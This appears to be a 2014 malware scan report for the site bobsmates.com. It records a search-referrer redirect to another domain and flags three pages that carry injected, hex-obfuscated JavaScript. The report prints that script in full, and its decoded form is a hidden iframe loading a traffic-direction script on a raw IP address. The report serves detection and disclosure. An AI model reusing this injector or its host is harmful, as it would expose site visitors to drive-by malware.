Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://bobsmates.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: bobsmates.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 20:42:25 GMT Location: http://padovarisorse.it/mambots/search/search.php Server: Apache Content-Length: 257 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://bobsmates.com/ | 200 OK Content-Length: 3724 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v51865d51c13ee(v51865d51c14ec){ function v51865d51c15ae () {var v51865d51c168f=16; return v51865d51c168f;} return(parseInt(v51865d51c14ec,v51865d51c15ae()));}function v51865d51c177c(v51865d51c1855){ function v51865d51c1a8a () {return 2;} var v51865d51c1908='';for(v51865d51c19e5=0; v51865d51c19e5<v51865d51c1855.length; v51865d51c19e5+=v51865d51c1a8a()){ v51865d51c1908+=(String.fromCharCode(v51865d51c13ee(v51865d51c1855.substr(v51865d51c19e5, v51865d51c1a8a()))));}return v51865d51c1908;} document.write(v51865d51c177c('3C696672616D65206E616D653D273861623727207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D3930206865696768743D3431207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='8ab7' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=90 height=41 style='display:none'></iframe> Antivirus reports:
| ||
http://bobsmates.com/includes/bmFunctions.js | 200 OK Content-Length: 6287 Content-Type: application/javascript | clean |
http://bobsmates.com/home.php | 200 OK Content-Length: 3738 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v51865d4fa92f3(v51865d4fa9bc8){ function v51865d4fa9c5f () {return 16;} return(parseInt(v51865d4fa9bc8,v51865d4fa9c5f()));}function v51865d4fa9d2e(v51865d4fa9d7b){ function v51865d4fa9fa3 () {return 2;} var v51865d4fa9dc5='';for(v51865d4fa9e0d=0; v51865d4fa9e0d<v51865d4fa9d7b.length; v51865d4fa9e0d+=v51865d4fa9fa3()){ v51865d4fa9dc5+=(String.fromCharCode(v51865d4fa92f3(v51865d4fa9d7b.substr(v51865d4fa9e0d, v51865d4fa9fa3()))));}return v51865d4fa9dc5;} document.write(v51865d4fa9d2e('3C696672616D65206E616D653D2762656532396427207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D333330206865696768743D353632207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='bee29d' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=330 height=562 style='display:none'></iframe> Antivirus reports:
| ||
http://bobsmates.com/curr_blurb.php | 200 OK Content-Length: 4728 Content-Type: text/html | clean |
http://bobsmates.com/discussion.php | 200 OK Content-Length: 49852 Content-Type: text/html | clean |
http://bobsmates.com/index.php | 200 OK Content-Length: 3724 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v51865d51c13ee(v51865d51c14ec){ function v51865d51c15ae () {var v51865d51c168f=16; return v51865d51c168f;} return(parseInt(v51865d51c14ec,v51865d51c15ae()));}function v51865d51c177c(v51865d51c1855){ function v51865d51c1a8a () {return 2;} var v51865d51c1908='';for(v51865d51c19e5=0; v51865d51c19e5<v51865d51c1855.length; v51865d51c19e5+=v51865d51c1a8a()){ v51865d51c1908+=(String.fromCharCode(v51865d51c13ee(v51865d51c1855.substr(v51865d51c19e5, v51865d51c1a8a()))));}return v51865d51c1908;} document.write(v51865d51c177c('3C696672616D65206E616D653D273861623727207372633D27687474703A2F2F3132342E3231372E3234392E34352F7E757365722F68746D6C2F5444532F676F2E7068703F7369643D31272077696474683D3930206865696768743D3431207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='8ab7' src='http://124.217.249.45/~user/html/TDS/go.php?sid=1' width=90 height=41 style='display:none'></iframe> Antivirus reports:
| ||
http://bobsmates.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sat, 20 Sep 2014 20:42:27 GMT Location: http://BishopsWaltham.net/Backgrounds/Various/thumbs.php Server: Apache Content-Length: 240 Content-Type: text/html; charset=iso-8859-1 | clean |
http://bishopswaltham.net/backgrounds/various/thumbs.php | 500 Internal Server Error Content-Length: 163 | clean |
http://bishopswaltham.net/test404page.js | 404 Not Found Content-Length: 5214 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bobsmates.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bobsmates.com/
Result: bobsmates.com is not infected or malware details are not published yet.
Result: bobsmates.com is not infected or malware details are not published yet.